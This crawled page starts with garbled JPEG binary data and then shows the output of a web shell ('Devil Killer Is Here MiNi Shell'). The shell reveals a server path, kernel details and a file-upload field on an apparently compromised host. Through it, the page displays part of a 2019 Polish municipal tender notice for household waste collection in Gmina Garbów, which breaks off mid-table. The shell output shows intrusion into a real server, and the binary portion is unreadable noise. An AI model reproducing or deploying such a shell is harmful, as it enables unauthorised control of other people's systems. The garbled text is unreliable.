JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190802/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190802/581632-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 581632-N-2019 z dnia 2019-08-02 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Garbów</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Odbieranie i zagospodarowanie odpadów komunalnych z nieruchomości zamieszkałych na terenie Gminy Garbów.</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Garbów</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">53527300000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Krakowskie Przedmieście</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">50</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">21-080</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Garbów</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">lubelskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">815 018 063</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">ug@garbow.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">815 018 070</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.bip.garbow.pl </span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">tak</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.garbow.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">pisemnie</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Gminy w Garbowie ul. Krakowskie Przedmiescie 50 , 21-080 Garbów</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Odbieranie i zagospodarowanie odpadów komunalnych z nieruchomości zamieszkałych na terenie Gminy Garbów.</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP.2710.VIII.ODP.1.2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.	Przedmiot zamówienia obejmuje świadczenie usług polegających na odbieraniu każdej ilości odpadów komunalnych od właścicieli nieruchomości zamieszkałych położonych na terenie Gminy Garbów oraz ich zagospodarowanie od 1 października 2019 roku do 30 września 2020 roku 2.	Zakres przedmiotu zamówienia obejmuje:a)	Odbiór i zagospodarowanie odpadów komunalnych z nieruchomości, na których zamieszkują mieszkańcy. b)	Organizacje Punktu Selektywnego Zbierania Odpadów Komunalnych na terenie Gminy Garbów , w tym odbiór i zagospodarowanie dostarczonych do PSZOK-u selektywnie zebranych odpadów komunalnych. Wykonawca będzie zobowiązany najpóźniej do dnia 7 października 2019 r. do zorganizowania i prowadzenia Punktu Selektywnego Zbierania Odpadów Komunalnych. PSZOK musi być wyposażony w kontenery i pojemniki do selektywnej zbiórki odpadów. W PSZOK Wykonawca będzie przyjmował odpady wymienione w §17 ust. 3 pkt 2 Regulaminu utrzymania czystości i porządku na terenie Gminy Garbów przyjętym uchwałą nr XXII/157/17 Rady Gminy Garbów z dnia 26 czerwca 2017 roku. Odbiór odpadów wskazanych w niniejszym punkcie będzie się odbywał zgodnie z Uchwała Rady Gminy Garbów Nr XIII/95/16 z dnia 28 czerwca 2016. Obsługa PSZOK będzie odbywała się w każdy pracujący poniedziałek od godziny 8.00 - 14.00 a w przypadku gdy poniedziałek będzie dniem wolnym od pracy w pierwszym kolejnym dniu pracującym. Obsługę PSZOK przez osoby odpowiednio przeszkolone zapewnia Wykonawcac)	Organizację odbioru mebli i innych odpadów wielkogabarytowych oraz zużytego sprzętu elektronicznego i elektrycznego w formie wystawek od właścicieli nieruchomości zamieszkałych.d)	Dostarczenie na teren nieruchomości objętych zbiórka odpadów komunalnych pojemników na odpady zmieszane lub pozostałości po segregowaniu (w przypadku deklarowania zbierania odpadów selektywnie) na czas trwania wykonywania przedmiotu umowy. Pojemniki dostarczone zostaną do dnia 1 października 2019 roku zgodnie z wykazem przekazanym przez Zamawiającego.e)	Dostarczenie pojemników na odpady segregowane w obowiązującej kolorystyce oraz pojemniki na odpady zmieszane dla spółdzielni mieszkaniowych oraz wspólnot mieszkaniowych, ewentualnie innych miejsc zbiórki odpadów w zabudowie wielorodzinnej,f)	Dostarczanie do gospodarstw domowych w zabudowie jednorodzinnej, których właściciele (zarządcy) dokonują selektywnej zbiórki odpadów komunalnych, worków do segregacji oznaczonych odpowiednią kolorystyką i nadrukiem informującą o rodzaju gromadzonych odpadów w sposób selektywny zgodnie z Regulaminem utrzymania czystości i porządku na terenie Gminy Garbów oraz Rozporządzeniem Ministra Środowiska z dnia 29 grudnia 2016 roku w sprawie szczegółowego sposobu zbierania wybranych frakcji odpadów (Dz.U z 2017 R. poz. 19), w ilości nie mniejszej od wystawionej lub w przypadku zgłoszenia przez Właścicieli potrzeby zwiększonej ilości worków - w ilości wg zapotrzebowania. W przypadku nie wystawienia worka z danym rodzajem odpadów - należy zostawić 1 sztukę worka w kolorze przewidzianym dla danej grupyg)	Dostarczenie do PSZOK pojemników o poj. 120 l i 240 l dla nowych mieszkańców lub do wymiany w związku ze zmianą ilości osób zamieszkujących nieruchomość.h)	Osiągnięcie odpowiednich poziomów recyklingu i przygotowania do ponownego użycia następujących frakcji odpadów komunalnych: papieru, metali, tworzyw sztucznych i szkła i) Osiągniecie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami innych niż niebezpieczne odpadów budowlanych i rozbiórkowychj) Ograniczenie masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania zgodnie z Rozporządzeniem Ministra Środowiska z dnia 15 grudnia 2017 r. w sprawie poziomów ograniczenia składowania masy odpadów komunalnych ulegających biodegradacjik)	opracowanie i dostarczenie mieszkańcom ulotki edukacyjno-informującej o sposobie segregacji odpadów wraz z harmonogramem odbioru odpadów l)	przekazywanie raportów miesięcznych o ilości i rodzaju odebranych odpadów;m)	wskazanie w ofercie instalacji regionalnych do których będą przekazywane odebrane odpadyn)	przekazywanie sprawozdań półrocznych oraz rocznych dla zebranych odpadów w Punkcie Selektywnego Zbierania Odpadów w terminie wskazanych w ustawieo)	przekazywanie kart przekazania odpadów wraz z dokumentami potwierdzającymi odzysk lub recyklingp)	w przypadku zakończenia realizacji zamówienia, zabranie pojemników z posesji odbędzie się w miesiącu następnym po zakończeniu umowy podczas pierwszego odbioru na podstawie nowej umowy.3.	Inne obowiązki Wykonawcy:a)	Wykonawca zobowiązany będzie do utrzymania pojazdów i urządzeń we właściwym stanie technicznym i sanitarnym. Pojazdy i urządzenia muszą być zabezpieczone przed niekontrolowanym wydostawaniem się na zewnątrz odpadów podczas transportu, przeładunku oraz magazynowania. Pojazdy i urządzenia muszą być poddawane myciu i dezynfekcji z częstotliwością gwarantującą zapewnienie im właściwego stanu sanitarnego.b)	Wykonawca będzie zobowiązany do posiadania bazy magazynowo- transportowej spełniającej następujące warunki:- położenie w odległości nie większej niż 60 km od granicy Gminy Garbów, - zabezpieczonej w sposób uniemożliwiający wstęp osobom nieupoważnionym,- zapewniającą miejsca do parkowania, zabezpieczone przed emisją zanieczyszczeń do gruntu- wyposażona w urządzenia lub systemy zapewniające zagospodarowanie wód opadowych i ścieków przemysłowych pochodzących z terenu bazy zgodnie z wymaganiami określonymi przepisami ustawy z dnia 18 lipca 2001 roku - Prawo wodne- wyposażona w miejsce do mycia i dezynfekcji pojazdów o ile czynności te nie są wykonywane przez zewnętrzne podmioty uprawnione poza terenem bazyc)	Wykonawca zobowiązany jest do niezwłocznego rozpatrzenia i załatwienia zgłoszonych reklamacji przez właścicieli nieruchomości . Informację o zgłaszanych reklamacjach wraz z ich kopiami oraz opis sposobu ich rozpatrzenia należy przesłać Zamawiającemu w terminie 7 dni od dnia załatwienia sprawyd)	Wykonawca zobowiązany jest do wyposażenia wszystkich pojazdów wykorzystywanych do realizacji przedmiotu zamówienia w system monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiający trwałe zapisywanie i odczytywanie danych o położeniu pojazdu i miejscach postojów oraz czujników zapisujących dane o miejscach wyładunku odpadów.e)	Wykonawca przez cały okres realizacji przedmiotu zamówienia zobowiązany jest zapewnić w siedzibie Zamawiającego na 1 stanowisku komputerowym dostęp do portalu internetowego umożliwiającego na bieżąco monitoring pracy pojazdów Wykonawcy. Wykonawca zobowiązany jest do zapewnienia ciągłości pracy systemu monitorującego oraz do archiwizowania na swoim serwerze wszystkich zarejestrowanych przez urządzenia pokładowe danych przez okres nie krótszy niż12 miesięcy i zapewnienia wglądu w te dane przez Zamawiającego.II.2 Charakterystyka gminy o	Powierzchnia Gminy Garbów wynosi 102,6 km?, liczba ludności zgodnie z danymi ewidencji ludności - wynosi 9141.Zestawienie ilości mieszkańców w poszczególnych miejscowościach zameldowanych na pobyt stały i czasowy (na podstawie danych z ewidencji ludności) na dzień 30 czerwca 2019 :Bogucin - 1163Borków - 295Garbów - 2189Gutanów - 489Janów - 237Karolin - 342Leśce - 531Meszno - 65Piotrowice Wielkie - 526Piotrowice Kolonia - 132Przybysławice - 823Wola Przybysławska - 1374Zagrody - 975Zamawiający zobowiązuje się przekazać Wykonawcy przed rozpoczęciem realizacji umowy wykaz nieruchomości wraz z rodzajem pojemnika przypisanego oraz sposobie gromadzenia odpadówW celu poprawnej wyceny zadania Wykonawca zapozna się ze specyfiką i ukształtowaniem terenu w/w miejscowości oraz układem gminnej sieci drogowej i rodzajem zabudowy.II.3 Wykonawca zobowiązany jest do odbierania i zagospodarowania odpadów komunalnych wymienionych w tabeli nr 1:Tabela nr1L.P.	RODZAJE ODPADÓW Kod odpadów	Miejsce odbioru1	Niesegregowane odpady komunalne	200301	z posesji2	Odpady ulegające biodegradacji,	200201	z posesji3	Szkło, opakowania ze szkła	200102, 150107	z posesji4	Odpady BIO i zielone z posesji / z PSZOK5	Odzież, tekstylia	200110, 200111	z posesji6	Papier i tektura, opakowania z papieru i tektury	200101, 150101	z posesji7	Tworzywa sztuczne, opakowania z tworzyw sztucznych, metal, Opakowania wielomateriałowe	200139, 150102, 150104, 150105	z posesji8	Inne nie wymienione frakcje zbierane w sposób selektywny 200199	z posesji9	Popioły i żużle 200399, 100101	Z posesji (1 x w miesiącu w okresie grzewczym od 1 listopada do 30 kwietnia10	Zużyty sprzęt elektryczny i elektroniczny, baterie	200123*, 200135*, 200136, 2001338, 200134	2 x w okresie obowiązywania umowy podczas mobilnej zbiórki bezpośrednio sprzed posesji, z PSZOK wg potrzeb11	Meble i inne odpady wielkogabarytowe	200307	2 x w okresie obowiązywania umowy podczas mobilnej zbiórki bezpośrednio sprzed posesji, z PSZOK wg potrzeb12	Odpady budowlane i rozbiórkowe inne niż niebezpieczne	170101, 170107	z PSZOK13	Opakowania zawierające pozostałości substancji niebezpiecznych lub nimi zanieczyszczone (chemikalia	200113*, 200114*, 200115*, 200117*, 200119*, 200126*, 200127*, 200128, 200129*, 20	z PSZOK14	Przeterminowane leki	20 01 32	z PSZOK15	Żarówki, świetlówki	160211*	z PSZOK16	Opony	160103	z PSZOK17	Styropian opakowaniowy 15 01 02	z PSZOK19	Folie rolnicze po belotach, worki po nawozach)	02 01 04	Z posesji razem z segregowanymi II.4 Częstotliwość odbioru odpadów Punkt Selektywnego Zbierania Odpadów Komunalnych*Zamawiający zobowiązuje się do przekazania bezpłatnie, w formie użyczenia niezbędnego obszaru działki na zorganizowanie punktu. Wykonawca wyposaży PSZOK w odpowiednie pojemniki służące do gromadzenia odpadów przyjmowanych w PSZOK.Wykonawca 1 raz w tygodniu ( poniedziałek) będzie obsługiwał punkt , tzn. będzie przyjmował przywożone przez mieszkańców odpady zgodnie z Regulaminem Punktu Zbierania Odpadów Komunalnych oraz prowadził ewidencje przyjętych odpadów obejmującą co najmniej imię, nazwisko i adres osoby oddającej odpady oraz rodzaj i ilość dostarczonych odpadów. Wykonawca ma obowiązek zapewnić obsługę PSZOK przez odpowiednio przeszkolone osoby.*Punkt Selektywnego Zbierania Odpadów traktowany będzie jako tymczasowe miejsce do magazynowania odpadów Odbiór selektywnie zebranych odpadów oraz pozostałości z segregowania i odpadów zmieszanych z nieruchomości jednorodzinnych odbędzie się w ten sam dzień osobnymi pojazdami dostosowanymi do poszczególnych grup odpadów.Z nieruchomości w zabudowie jednorodzinnej, do których dojazd jest utrudniony, z nieruchomości wskazanych przez zamawiającego oraz nieruchomości pominiętych czasie objazdu w dniu wyznaczonym w harmonogramie dostarczonym przez Wykonawcę, odbiór odpadów będzie odbywał się w ostatnim tygodniu danego miesiąca na podstawie listy nieruchomości przekazanej przez Zamawiającego. W takich przypadkach właścicielom nieruchomości wskazanym przez Zamawiającego Wykonawca dostarczy również worki na pozostałości z sortowania lub odpady zmieszane.Tabela nr 2. Ilość odebranych odpadów w 2018 r. z terenu gminy Garbów na podstawie sprawozdań - nieruchomości zamieszkałe (pomocniczo) kod odpadów	Nazwa odpadów	ilość odebranych odpadów (Mg)200301	Niesegregowane (zmieszane) odpady komunalne	976,7150107	opakowania ze szkła	1,9200102	szkło	45,92200199	inne niż wymienione frakcje zbierane w sposób selektywny	40,26Ex200199	selektywnie zbierane odpady opakowaniowe	88,28200307	odpady wielkogabarytowe	34,98Ex200199	popioły z palenisk domowych	60,36Ex200399	popioły z palenisk domowych	144,78200203	inne odpady nieulegające biodegradacji	24,44150101	opakowania z papieru i tektury	81,44200108	odpady kuchenne ulegające	4,06150102	opakowania z tworzyw sztucznych	8,18150106	zmieszane odpady opakowaniowe	4,38200201	papier i tektura	3,31200102	szkło	52,45200139	tworzywa sztuczne	10,44200136	zużyte urządzenia elektryczne i elektroniczne inne niż wymienione w 200121, 200123, 200135	16,98Ex200108	bioodpady (ulegające biodegradacji odpady kuchenne wraz z odpadami z ogrodów i parków)	1,86150101	opakowania z papieru i tektury	31,05200108	odpady kuchenne ulegające biodegradacji	4,06200101	papier i tektura	